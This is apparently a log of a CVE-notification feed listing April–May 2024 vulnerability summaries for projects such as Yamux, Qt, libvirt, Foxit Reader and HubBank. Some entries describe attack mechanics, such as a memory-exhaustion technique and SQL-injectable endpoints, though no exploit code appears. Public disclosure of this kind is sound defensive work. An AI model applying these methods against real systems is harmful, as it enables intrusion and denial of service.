🚨 CVE-2024-32984Yamux is a stream multiplexer over reliable, ordered connections such as TCP/IP. The Rust implementation of the Yamux stream multiplexer uses a vector for pending frames. This vector is not bounded in length. Every time the Yamux protocol requires sending of a new frame, this frame gets appended to this vector. This can be remotely triggered in a number of ways, for example by: 1. Opening a new libp2p Identify stream. This causes the node to send its Identify message. Of course, every other protocol that causes the sending of data also works. The larger the response, the more data is enqueued. 2. Sending a Yamux Ping frame. This causes a Pong frame to be enqueued. Under normal circumstances, this queue of pending frames would be drained once they’re sent out over the network. However, the attacker can use TCP’s receive window mechanism to prevent the victim from sending out any data: By not reading from the TCP connection, the receive window will never be increased, and the victim won’t be able to send out any new data (this is how TCP implements backpressure). Once this happens, Yamux’s queue of pending frames will start growing indefinitely. The queue will only be drained once the underlying TCP connection is closed. An attacker can cause a remote node to run out of memory, which will result in the corresponding process getting terminated by the operating system.🎖@cveNotify |
|
| 2024-05-01 11:37:25 |
🚨 CVE-2024-32979Nautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. It was discovered that due to improper handling and escaping of user-provided query parameters, a maliciously crafted Nautobot URL could potentially be used to execute a Reflected Cross-Site Scripting (Reflected XSS) attack against users. All filterable object-list views in Nautobot are vulnerable. This issue has been fixed in Nautobot versions 1.6.20 and 2.2.3. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-05-01 11:37:24 |
🚨 CVE-2024-32973Pluto is a superset of Lua 5.4 with a focus on general-purpose programming. In affected versions an attacker with the ability to actively intercept network traffic would be able to use a specifically-crafted certificate to fool Pluto into trusting it to be the intended remote for the TLS session. This results in the HTTP library and socket.starttls providing less transport integrity than expected. This issue has been patched in pull request #851 which has been included in version 0.9.3. Users are advised to upgrade. there are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-05-01 07:37:35 |
🚨 CVE-2024-32967Zitadel is an open source identity management system. In case ZITADEL could not connect to the database, connection information including db name, username and db host name could be returned to the user. This has been addressed in all supported release branches in a point release. There is no workaround since a patch is already available. Users are advised to upgrade.🎖@cveNotify |
|
| 2024-05-01 07:37:34 |
🚨 CVE-2024-32963Navidrome is an open source web-based music collection server and streamer. In affected versions of Navidrome are subject to a parameter tampering vulnerability where an attacker has the ability to manipulate parameter values in the HTTP requests. The attacker is able to change the parameter values in the body and successfully impersonate another user. In this case, the attacker created a playlist, added song, posted arbitrary comment, set the playlist to be public, and put the admin as the owner of the playlist. The attacker must be able to intercept http traffic for this attack. Each known user is impacted. An attacker can obtain the ownerId from shared playlist information, meaning every user who has shared a playlist is also impacted, as they can be impersonated. This issue has been addressed in version 0.52.0 and users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-05-01 07:37:33 |
🚨 CVE-2024-32890librespeed/speedtest is an open source, self-hosted speed test for HTML5. In affected versions missing neutralization of the ISP information in a speedtest result leads to stored Cross-site scripting in the JSON API. The `processedString` field in the `ispinfo` parameter is missing neutralization. It is stored when a user submits a speedtest result to the telemetry API (`results/telemetry.php`) and returned in the JSON API (`results/json.php`). This vulnerability has been introduced in commit 3937b94. This vulnerability affects LibreSpeed speedtest instances running version 5.2.5 or higher which have telemetry enabled and has been addressed in version 5.3.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-05-01 07:37:29 |
🚨 CVE-2024-32017RIOT is a real-time multi-threading operating system that supports a range of devices that are typically 8-bit, 16-bit and 32-bit microcontrollers. The size check in the `gcoap_dns_server_proxy_get()` function contains a small typo that may lead to a buffer overflow in the subsequent `strcpy()`. In detail, the length of the `_uri` string is checked instead of the length of the `_proxy` string. The `_gcoap_forward_proxy_copy_options()` function does not implement an explicit size check before copying data to the `cep->req_etag` buffer that is `COAP_ETAG_LENGTH_MAX` bytes long. If an attacker can craft input so that `optlen` becomes larger than `COAP_ETAG_LENGTH_MAX`, they can cause a buffer overflow. If the input above is attacker-controlled and crosses a security boundary, the impact of the buffer overflow vulnerabilities could range from denial of service to arbitrary code execution. This issue has yet to be patched. Users are advised to add manual bounds checking.🎖@cveNotify |
|
| 2024-05-01 07:37:28 |
🚨 CVE-2024-23336MyBB is a free and open source forum software. The default list of disallowed remote hosts does not contain the `127.0.0.0/8` block, which may result in a Server-Side Request Forgery (SSRF) vulnerability. The Configuration File's _Disallowed Remote Addresses_ list (`$config['disallowed_remote_addresses']`) contains the address `127.0.0.1`, but does not include the complete block `127.0.0.0/8`. MyBB 1.8.38 resolves this issue in default installations. Administrators of installed boards should update the existing configuration (`inc/config.php`) to include all addresses blocked by default. Additionally, users are advised to verify that it includes any other IPv4 addresses resolving to the server and other internal resources. Users unable to upgrade may manually add 127.0.0.0/8' to their disallowed address list.🎖@cveNotify |
|
| 2024-05-01 07:37:27 |
🚨 CVE-2024-23335MyBB is a free and open source forum software. The backup management module of the Admin CP may accept `.htaccess` as the name of the backup file to be deleted, which may expose the stored backup files over HTTP on Apache servers. MyBB 1.8.38 resolves this issue. Users are advised to upgrade. There are no known workarounds for this vulnerability🎖@cveNotify |
|
| 2024-05-01 06:37:25 |
🚨 CVE-2023-52647In the Linux kernel, the following vulnerability has been resolved:media: nxp: imx8-isi: Check whether crossbar pad is non-NULL before accessWhen translating source to sink streams in the crossbar subdev, thedriver tries to locate the remote subdev connected to the sink pad. Theremote pad may be NULL, if userspace tries to enable a stream that endsat an unconnected crossbar sink. When that occurs, the driverdereferences the NULL pad, leading to a crash.Prevent the crash by checking if the pad is NULL before using it, andreturn an error if it is.🎖@cveNotify |
|
| 2024-05-01 05:37:24 |
🚨 CVE-2024-22403Nextcloud server is a self hosted personal cloud system. In affected versions OAuth codes did not expire. When an attacker would get access to an authorization code they could authenticate at any time using the code. As of version 28.0.0 OAuth codes are invalidated after 10 minutes and will no longer be authenticated. To exploit this vulnerability an attacker would need to intercept an OAuth code from a user session. It is recommended that the Nextcloud Server is upgraded to 28.0.0. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-05-01 04:37:29 |
🚨 CVE-2024-28979Dell OpenManage Enterprise, versions prior to 4.1.0, contains an XSS injection vulnerability in UI. A high privileged local attacker could potentially exploit this vulnerability, leading to JavaScript injection.🎖@cveNotify |
|
| 2024-05-01 04:37:28 |
🚨 CVE-2024-1753A flaw was found in Buildah (and subsequently Podman Build) which allows containers to mount arbitrary locations on the host filesystem into build containers. A malicious Containerfile can use a dummy image with a symbolic link to the root filesystem as a mount source and cause the mount operation to mount the host root filesystem inside the RUN step. The commands inside the RUN step will then have read-write access to the host filesystem, allowing for full container escape at build time.🎖@cveNotify |
|
| 2024-05-01 03:37:26 |
🚨 CVE-2024-33768lunasvg v2.3.9 was discovered to contain a segmentation violation via the component composition_solid_source_over.🎖@cveNotify |
|
| 2024-05-01 03:37:25 |
🚨 CVE-2024-33764lunasvg v2.3.9 was discovered to contain a stack-overflow at lunasvg/source/element.h.🎖@cveNotify |
|
| 2024-05-01 03:37:24 |
🚨 CVE-2024-33763lunasvg v2.3.9 was discovered to contain a stack-buffer-underflow at lunasvg/source/layoutcontext.cpp.🎖@cveNotify |
|
| 2024-05-01 01:37:31 |
🚨 CVE-2023-51714An issue was discovered in the HTTP2 implementation in Qt before 5.15.17, 6.x before 6.2.11, 6.3.x through 6.5.x before 6.5.4, and 6.6.x before 6.6.2. network/access/http2/hpacktable.cpp has an incorrect HPack integer overflow check.🎖@cveNotify |
|
| 2024-05-01 01:37:30 |
🚨 CVE-2023-37369In Qt before 5.15.15, 6.x before 6.2.9, and 6.3.x through 6.5.x before 6.5.2, there can be an application crash in QXmlStreamReader via a crafted XML string that triggers a situation in which a prefix is greater than a length.🎖@cveNotify |
|
| 2024-05-01 01:37:27 |
🚨 CVE-2023-38197An issue was discovered in Qt before 5.15.15, 6.x before 6.2.10, and 6.3.x through 6.5.x before 6.5.3. There are infinite loops in recursive entity expansion.🎖@cveNotify |
|
| 2024-05-01 01:37:26 |
🚨 CVE-2023-32762An issue was discovered in Qt before 5.15.14, 6.x before 6.2.9, and 6.3.x through 6.5.x before 6.5.1. Qt Network incorrectly parses the strict-transport-security (HSTS) header, allowing unencrypted connections to be established, even when explicitly prohibited by the server. This happens if the case used for this header does not exactly match.🎖@cveNotify |
|
| 2024-05-01 01:37:25 |
🚨 CVE-2023-24607Qt before 6.4.3 allows a denial of service via a crafted string when the SQL ODBC driver plugin is used and the size of SQLTCHAR is 4. The affected versions are 5.x before 5.15.13, 6.x before 6.2.8, and 6.3.x before 6.4.3.🎖@cveNotify |
|
| 2024-05-01 01:07:34 |
🚨 CVE-2024-29988SmartScreen Prompt Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-05-01 00:37:37 |
🚨 CVE-2024-4369An information disclosure flaw was found in OpenShift's internal image registry operator. AZURE_CLIENT_SECRET can be exposed through an environment variable defined in the pod definition, but is limited to Azure environments. An attacker controlling an account that has high enough permissions to obtain pod information from the openshift-image-registry namespace could use this obtained client secret to perform actions as the registry operator's Azure service account.🎖@cveNotify |
|
| 2024-04-30 22:37:25 |
🚨 CVE-2024-28182nghttp2 is an implementation of the Hypertext Transfer Protocol version 2 in C. The nghttp2 library prior to version 1.61.0 keeps reading the unbounded number of HTTP/2 CONTINUATION frames even after a stream is reset to keep HPACK context in sync. This causes excessive CPU usage to decode HPACK stream. nghttp2 v1.61.0 mitigates this vulnerability by limiting the number of CONTINUATION frames it accepts per stream. There is no workaround for this vulnerability.🎖@cveNotify |
|
| 2024-04-30 22:37:24 |
🚨 CVE-2022-25517MyBatis plus v3.4.3 was discovered to contain a SQL injection vulnerability via the Column parameter in /core/conditions/AbstractWrapper.java. NOTE: the vendor's position is that the reported execution of a SQL statement was intended behavior.🎖@cveNotify |
|
| 2024-04-30 21:37:25 |
🚨 CVE-2024-29466Directory Traversal vulnerability in lsgwr spring boot online exam v.0.9 allows an attacker to execute arbitrary code via the FileTransUtil.java component.🎖@cveNotify |
|
| 2024-04-30 21:07:24 |
🚨 CVE-2024-4071A vulnerability was found in Kashipara Online Furniture Shopping Ecommerce Website 1.0 and classified as critical. This issue affects some unknown processing of the file prodInfo.php. The manipulation of the argument prodId leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-261797 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-30 20:37:44 |
🚨 CVE-2024-4071A vulnerability was found in Kashipara Online Furniture Shopping Ecommerce Website 1.0 and classified as critical. This issue affects some unknown processing of the file prodInfo.php. The manipulation of the argument prodId leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-261797 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-30 20:37:43 |
🚨 CVE-2024-31081A heap-based buffer over-read vulnerability was found in the X.org server's ProcXIPassiveGrabDevice() function. This issue occurs when byte-swapped length values are used in replies, potentially leading to memory leakage and segmentation faults, particularly when triggered by a client with a different endianness. This vulnerability could be exploited by an attacker to cause the X server to read heap memory values and then transmit them back to the client until encountering an unmapped page, resulting in a crash. Despite the attacker's inability to control the specific memory copied into the replies, the small length values typically stored in a 32-bit integer can result in significant attempted out-of-bounds reads.🎖@cveNotify |
|
| 2024-04-30 20:37:39 |
🚨 CVE-2024-31080A heap-based buffer over-read vulnerability was found in the X.org server's ProcXIGetSelectedEvents() function. This issue occurs when byte-swapped length values are used in replies, potentially leading to memory leakage and segmentation faults, particularly when triggered by a client with a different endianness. This vulnerability could be exploited by an attacker to cause the X server to read heap memory values and then transmit them back to the client until encountering an unmapped page, resulting in a crash. Despite the attacker's inability to control the specific memory copied into the replies, the small length values typically stored in a 32-bit integer can result in significant attempted out-of-bounds reads.🎖@cveNotify |
|
| 2024-04-30 20:37:38 |
🚨 CVE-2024-2494A flaw was found in the RPC library APIs of libvirt. The RPC server deserialization code allocates memory for arrays before the non-negative length check is performed by the C API entry points. Passing a negative length to the g_new0 function results in a crash due to the negative length being treated as a huge positive number. This flaw allows a local, unprivileged user to perform a denial of service attack by causing the libvirt daemon to crash.🎖@cveNotify |
|
| 2024-04-30 20:37:37 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-04-30 20:37:33 |
🚨 CVE-2024-29471OneBlog v2.3.4 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Notice Manage module.🎖@cveNotify |
|
| 2024-04-30 20:37:32 |
🚨 CVE-2024-1441An off-by-one error flaw was found in the udevListInterfacesByStatus() function in libvirt when the number of interfaces exceeds the size of the `names` array. This issue can be reproduced by sending specially crafted data to the libvirt daemon, allowing an unprivileged client to perform a denial of service attack by causing the libvirt daemon to crash.🎖@cveNotify |
|
| 2024-04-30 20:37:28 |
🚨 CVE-2024-1488A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.🎖@cveNotify |
|
| 2024-04-30 20:37:27 |
🚨 CVE-2023-39683Cross Site Scripting (XSS) vulnerability in EasyEmail v.4.12.2 and before allows a local attacker to execute arbitrary code via the user input parameter(s). NOTE: Researcher claims issue is present in all versions prior and later than tested version.🎖@cveNotify |
|
| 2024-04-30 20:37:26 |
🚨 CVE-2023-6546A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-04-30 19:37:26 |
🚨 CVE-2024-26584In the Linux kernel, the following vulnerability has been resolved:net: tls: handle backlogging of crypto requestsSince we're setting the CRYPTO_TFM_REQ_MAY_BACKLOG flag on ourrequests to the crypto API, crypto_aead_{encrypt,decrypt} can return -EBUSY instead of -EINPROGRESS in valid situations. For example, whenthe cryptd queue for AESNI is full (easy to trigger with anartificially low cryptd.cryptd_max_cpu_qlen), requests will be enqueuedto the backlog but still processed. In that case, the async callbackwill also be called twice: first with err == -EINPROGRESS, which itseems we can just ignore, then with err == 0.Compared to Sabrina's original patch this version uses the newtls_*crypt_async_wait() helpers and converts the EBUSY toEINPROGRESS to avoid having to modify all the error handlingpaths. The handling is identical.🎖@cveNotify |
|
| 2024-04-30 19:37:25 |
🚨 CVE-2023-28863AMI MegaRAC SPx12 and SPx13 devices have Insufficient Verification of Data Authenticity.🎖@cveNotify |
|
| 2024-04-30 18:37:36 |
🚨 CVE-2024-33831A stored cross-site scripting (XSS) vulnerability in the Advanced Expectation - Response module of yapi v1.10.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the body field.🎖@cveNotify |
|
| 2024-04-30 18:37:35 |
🚨 CVE-2024-33103An arbitrary file upload vulnerability in the Media Manager component of DokuWiki 2024-02-06a allows attackers to execute arbitrary code via uploading a crafted SVG file.🎖@cveNotify |
|
| 2024-04-30 18:37:31 |
🚨 CVE-2024-33101A stored cross-site scripting (XSS) vulnerability in the component /action/anti.php of ThinkSAAS v3.7.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the word parameter.🎖@cveNotify |
|
| 2024-04-30 18:37:30 |
🚨 CVE-2019-19755ethOS through 1.3.3 ships with SSH host keys baked into the installation image, which allows man-in-the-middle attacks and makes identification of all public IPv4 nodes trivial with Shodan.io. NOTE: as of 2019-12-01, the vendor indicated that they plan to fix this.🎖@cveNotify |
|
| 2024-04-30 18:37:26 |
🚨 CVE-2019-19754HiveOS through 0.6-102@191212 ships with SSH host keys baked into the installation image, which allows man-in-the-middle attacks and makes identification of all public IPv4 nodes trivial with Shodan.io. NOTE: as of 2019-09-26, the vendor indicated that they would consider fixing this.🎖@cveNotify |
|
| 2024-04-30 18:37:25 |
🚨 CVE-2019-19751easyMINE before 2019-12-05 ships with SSH host keys baked into the installation image, which allows man-in-the-middle attacks and makes identification of all public IPv4 nodes trivial with Shodan.io.🎖@cveNotify |
|
| 2024-04-30 18:37:24 |
🚨 CVE-2019-19750minerstat msOS before 2019-10-23 does not have a unique SSH key for each instance of the product.🎖@cveNotify |
|
| 2024-04-30 18:07:42 |
🚨 CVE-2024-33273SQL injection vulnerability in shipup before v.3.3.0 allows a remote attacker to escalate privileges via the getShopID function.🎖@cveNotify |
|
| 2024-04-30 18:07:41 |
🚨 CVE-2024-33267SQL Injection vulnerability in Hero hfheropayment v.1.2.5 and before allows an attacker to escalate privileges via the HfHeropaymentGatewayBackModuleFrontController::initContent() function.🎖@cveNotify |
|
| 2024-04-30 18:07:40 |
🚨 CVE-2024-2877Vault Enterprise, when configured with performance standby nodes and a configured audit device, will inadvertently log request headers on the standby node. These logs may have included sensitive HTTP request information in cleartext.This vulnerability, CVE-2024-2877, was fixed in Vault Enterprise 1.15.8.🎖@cveNotify |
|
| 2024-04-30 18:07:37 |
🚨 CVE-2024-28716An issue in OpenStack Storlets yoga-eom allows a remote attacker to execute arbitrary code via the gateway.py component.🎖@cveNotify |
|
| 2024-04-30 18:07:36 |
🚨 CVE-2024-25938A use-after-free vulnerability exists in the way Foxit Reader 2024.1.0.23997 handles a Barcode widget. A specially crafted JavaScript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.🎖@cveNotify |
|
| 2024-04-30 17:37:27 |
🚨 CVE-2024-25938A use-after-free vulnerability exists in the way Foxit Reader 2024.1.0.23997 handles a Barcode widget. A specially crafted JavaScript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.🎖@cveNotify |
|
| 2024-04-30 17:37:26 |
🚨 CVE-2024-25575A type confusion vulnerability vulnerability exists in the way Foxit Reader 2024.1.0.23997 handles a Lock object. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.🎖@cveNotify |
|
| 2024-04-30 16:37:26 |
🚨 CVE-2024-29320Wallos before 1.15.3 is vulnerable to SQL Injection via the category and payment parameters to /subscriptions/get.php.🎖@cveNotify |
|
| 2024-04-30 15:37:43 |
🚨 CVE-2024-33270An issue in FME Modules fileuploads v.2.0.3 and before and fixed in v2.0.4 allows a remote attacker to obtain sensitive information via the uploadfiles.php component.🎖@cveNotify |
|
| 2024-04-30 15:37:42 |
🚨 CVE-2024-28716An issue in OpenStack Storlets yoga-eom allows a remote attacker to execute arbitrary code via the gateway.py component.🎖@cveNotify |
|
| 2024-04-30 15:37:41 |
🚨 CVE-2024-25938A use-after-free vulnerability exists in the way Foxit Reader 2024.1.0.23997 handles a Barcode widget. A specially crafted JavaScript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.🎖@cveNotify |
|
| 2024-04-30 15:37:37 |
🚨 CVE-2024-25575A type confusion vulnerability vulnerability exists in the way Foxit Reader 2024.1.0.23997 handles a Lock object. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.🎖@cveNotify |
|
| 2024-04-30 15:37:36 |
🚨 CVE-2023-38002IBM Storage Scale 5.1.0.0 through 5.1.9.2 could allow an authenticated user to steal or manipulate an active session to gain access to the system. IBM X-Force ID: 260208.🎖@cveNotify |
|
| 2024-04-30 15:37:35 |
🚨 CVE-2022-48658In the Linux kernel, the following vulnerability has been resolved:mm: slub: fix flush_cpu_slab()/__free_slab() invocations in task context.Commit 5a836bf6b09f ("mm: slub: move flush_cpu_slab() invocations__free_slab() invocations out of IRQ context") moved all flush_cpu_slab()invocations to the global workqueue to avoid a problem relatedwith deactivate_slab()/__free_slab() being called from an IRQ contexton PREEMPT_RT kernels.When the flush_all_cpu_locked() function is called from a task contextit may happen that a workqueue with WQ_MEM_RECLAIM bit set ends upflushing the global workqueue, this will cause a dependency issue. workqueue: WQ_MEM_RECLAIM nvme-delete-wq:nvme_delete_ctrl_work [nvme_core] is flushing !WQ_MEM_RECLAIM events:flush_cpu_slab WARNING: CPU: 37 PID: 410 at kernel/workqueue.c:2637 check_flush_dependency+0x10a/0x120 Workqueue: nvme-delete-wq nvme_delete_ctrl_work [nvme_core] RIP: 0010:check_flush_dependency+0x10a/0x120[ 453.262125] Call Trace: __flush_work.isra.0+0xbf/0x220 ? __queue_work+0x1dc/0x420 flush_all_cpus_locked+0xfb/0x120 __kmem_cache_shutdown+0x2b/0x320 kmem_cache_destroy+0x49/0x100 bioset_exit+0x143/0x190 blk_release_queue+0xb9/0x100 kobject_cleanup+0x37/0x130 nvme_fc_ctrl_free+0xc6/0x150 [nvme_fc] nvme_free_ctrl+0x1ac/0x2b0 [nvme_core]Fix this bug by creating a workqueue for the flush operation withthe WQ_MEM_RECLAIM bit set.🎖@cveNotify |
|
| 2024-04-30 15:37:32 |
🚨 CVE-2022-48655In the Linux kernel, the following vulnerability has been resolved:firmware: arm_scmi: Harden accesses to the reset domainsAccessing reset domains descriptors by the index upon the SCMI driversrequests through the SCMI reset operations interface can potentiallylead to out-of-bound violations if the SCMI driver misbehave.Add an internal consistency check before any such domains descriptorsaccesses.🎖@cveNotify |
|
| 2024-04-30 15:37:31 |
🚨 CVE-2023-6004A flaw was found in libssh. By utilizing the ProxyCommand or ProxyJump feature, users can exploit unchecked hostname syntax on the client. This issue may allow an attacker to inject malicious code into the command of the features mentioned through the hostname parameter.🎖@cveNotify |
|
| 2024-04-30 15:37:30 |
🚨 CVE-2023-6228An issue was found in the tiffcp utility distributed by the libtiff package where a crafted TIFF file on processing may cause a heap-based buffer overflow leads to an application crash.🎖@cveNotify |
|
| 2024-04-30 15:37:26 |
🚨 CVE-2023-6710A flaw was found in the mod_proxy_cluster in the Apache server. This issue may allow a malicious user to add a script in the 'alias' parameter in the URL to trigger the stored cross-site scripting (XSS) vulnerability. By adding a script on the alias parameter on the URL, it adds a new virtual host and adds the script to the cluster-manager page.🎖@cveNotify |
|
| 2024-04-30 15:37:25 |
🚨 CVE-2023-41175A vulnerability was found in libtiff due to multiple potential integer overflows in raw2tiff.c. This flaw allows remote attackers to cause a denial of service or possibly execute an arbitrary code via a crafted tiff image, which triggers a heap-based buffer overflow.🎖@cveNotify |
|
| 2024-04-30 15:37:24 |
🚨 CVE-2023-40745LibTIFF is vulnerable to an integer overflow. This flaw allows remote attackers to cause a denial of service (application crash) or possibly execute an arbitrary code via a crafted tiff image, which triggers a heap-based buffer overflow.🎖@cveNotify |
|
| 2024-04-30 14:37:47 |
🚨 CVE-2023-5367A out-of-bounds write flaw was found in the xorg-x11-server. This issue occurs due to an incorrect calculation of a buffer offset when copying data stored in the heap in the XIChangeDeviceProperty function in Xi/xiproperty.c and in RRChangeOutputProperty function in randr/rrproperty.c, allowing for possible escalation of privileges or denial of service.🎖@cveNotify |
|
| 2024-04-30 14:37:46 |
🚨 CVE-2023-4692An out-of-bounds write flaw was found in grub2's NTFS filesystem driver. This issue may allow an attacker to present a specially crafted NTFS filesystem image, leading to grub's heap metadata corruption. In some circumstances, the attack may also corrupt the UEFI firmware heap metadata. As a result, arbitrary code execution and secure boot protection bypass may be achieved.🎖@cveNotify |
|
| 2024-04-30 14:37:42 |
🚨 CVE-2023-43789A vulnerability was found in libXpm where a vulnerability exists due to a boundary condition, a local user can trigger an out-of-bounds read error and read contents of memory on the system.🎖@cveNotify |
|
| 2024-04-30 14:37:41 |
🚨 CVE-2023-43786A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition.🎖@cveNotify |
|
| 2024-04-30 14:37:40 |
🚨 CVE-2023-43785A vulnerability was found in libX11 due to a boundary condition within the _XkbReadKeySyms() function. This flaw allows a local user to trigger an out-of-bounds read error and read the contents of memory on the system.🎖@cveNotify |
|
| 2024-04-30 14:37:36 |
🚨 CVE-2023-39189A flaw was found in the Netfilter subsystem in the Linux kernel. The nfnl_osf_add_callback function did not validate the user mode controlled opt_num field. This flaw allows a local privileged (CAP_NET_ADMIN) attacker to trigger an out-of-bounds read, leading to a crash or information disclosure.🎖@cveNotify |
|
| 2024-04-30 14:37:35 |
🚨 CVE-2023-5215A flaw was found in libnbd. A server can reply with a block size larger than 2^63 (the NBD spec states the size is a 64-bit unsigned value). This issue could lead to an application crash or other unintended behavior for NBD clients that doesn't treat the return value of the nbd_get_size() function correctly.🎖@cveNotify |
|
| 2024-04-30 14:37:31 |
🚨 CVE-2023-42756A flaw was found in the Netfilter subsystem of the Linux kernel. A race condition between IPSET_CMD_ADD and IPSET_CMD_SWAP can lead to a kernel panic due to the invocation of `__ip_set_put` on a wrong `set`. This issue may allow a local user to crash the system.🎖@cveNotify |
|
| 2024-04-30 14:37:30 |
🚨 CVE-2023-4133A use-after-free vulnerability was found in the cxgb4 driver in the Linux kernel. The bug occurs when the cxgb4 device is detaching due to a possible rearming of the flower_stats_timer from the work queue. This flaw allows a local user to crash the system, causing a denial of service condition.🎖@cveNotify |
|
| 2024-04-30 14:37:29 |
🚨 CVE-2023-3019A DMA reentrancy issue leading to a use-after-free error was found in the e1000e NIC emulation code in QEMU. This issue could allow a privileged guest user to crash the QEMU process on the host, resulting in a denial of service.🎖@cveNotify |
|
| 2024-04-30 13:38:20 |
🚨 CVE-2024-34020A stack-based buffer overflow was found in the putSDN() function of mail.c in hcode through 2.1.🎖@cveNotify |
|
| 2024-04-30 13:38:19 |
🚨 CVE-2024-34010Local privilege escalation due to unquoted search path vulnerability. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 37758.🎖@cveNotify |
|
| 2024-04-30 13:38:18 |
🚨 CVE-2024-23995Cross Site Scripting (XSS) in Beekeeper Studio 4.1.13 and earlier allows remote attackers to execute arbitrary code in the column name of a database table in tabulator-popup-container.🎖@cveNotify |
|
| 2024-04-30 13:38:14 |
🚨 CVE-2023-48683Sensitive information disclosure and manipulation due to missing authorization. The following products are affected: Acronis Cyber Protect Cloud Agent (Linux, macOS, Windows) before build 37758.🎖@cveNotify |
|
| 2024-04-30 13:38:13 |
🚨 CVE-2024-1969Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in Secomea GateManager (webserver modules) allows crash of GateManager.This issue affects GateManager: from 9.7 before 11.2.624095033.🎖@cveNotify |
|
| 2024-04-30 13:38:12 |
🚨 CVE-2024-1579Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG) vulnerability in Secomea GateManager (Webserver modules) allows Session Hijacking.This issue affects GateManager: before 11.2.624071020.🎖@cveNotify |
|
| 2024-04-30 13:38:09 |
🚨 CVE-2024-4310Cross-site Scripting (XSS) vulnerability in HubBank affecting version 1.0.2. This vulnerability allows an attacker to send a specially crafted JavaScript payload to registration and profile forms and trigger the payload when any authenticated user loads the page, resulting in a session takeover.🎖@cveNotify |
|
| 2024-04-30 13:38:08 |
🚨 CVE-2024-4308SQL injection vulnerability in HubBank affecting version 1.0.2. This vulnerability could allow an attacker to send a specially crafted SQL query to the database through different endpoints (/admin/view_users.php?id=1,/admin/viewloan-trans.php?id=1,/admin/view-deposit.php?id=1,/admin/view-domtrans.php?id=1, /admin/delete_cards.php?id=1,/admin/view_cards.php?id=1 and /admin/view_users.php?id=1, id parameter) and retrieve the information stored in the database.🎖@cveNotify |
|
| 2024-04-30 13:38:07 |
🚨 CVE-2024-33588Missing Authorization vulnerability in codeSavory Knowledge Base documentation & wiki plugin – BasePress.This issue affects Knowledge Base documentation & wiki plugin – BasePress: from n/a through 2.16.1.🎖@cveNotify |
|
| 2024-04-30 13:38:03 |
🚨 CVE-2024-33587Missing Authorization vulnerability in Copy Content Protection Team Secure Copy Content Protection and Content Locking.This issue affects Secure Copy Content Protection and Content Locking: from n/a through 3.9.0.🎖@cveNotify |
|
| 2024-04-30 13:38:02 |
🚨 CVE-2024-33585Missing Authorization vulnerability in Tyche Softwares Payment Gateway Based Fees and Discounts for WooCommerce.This issue affects Payment Gateway Based Fees and Discounts for WooCommerce: from n/a through 2.12.1.🎖@cveNotify |
|
| 2024-04-30 13:38:01 |
🚨 CVE-2023-40548A buffer overflow was found in Shim in the 32-bit system. The overflow happens due to an addition operation involving a user-controlled value parsed from the PE binary being used by Shim. This value is further used for memory allocation operations, leading to a heap-based buffer overflow. This flaw causes memory corruption and can lead to a crash or data integrity issues during the boot phase.🎖@cveNotify |
|
| 2024-04-30 12:39:15 |
None |
|
| 2024-04-30 12:37:24 |
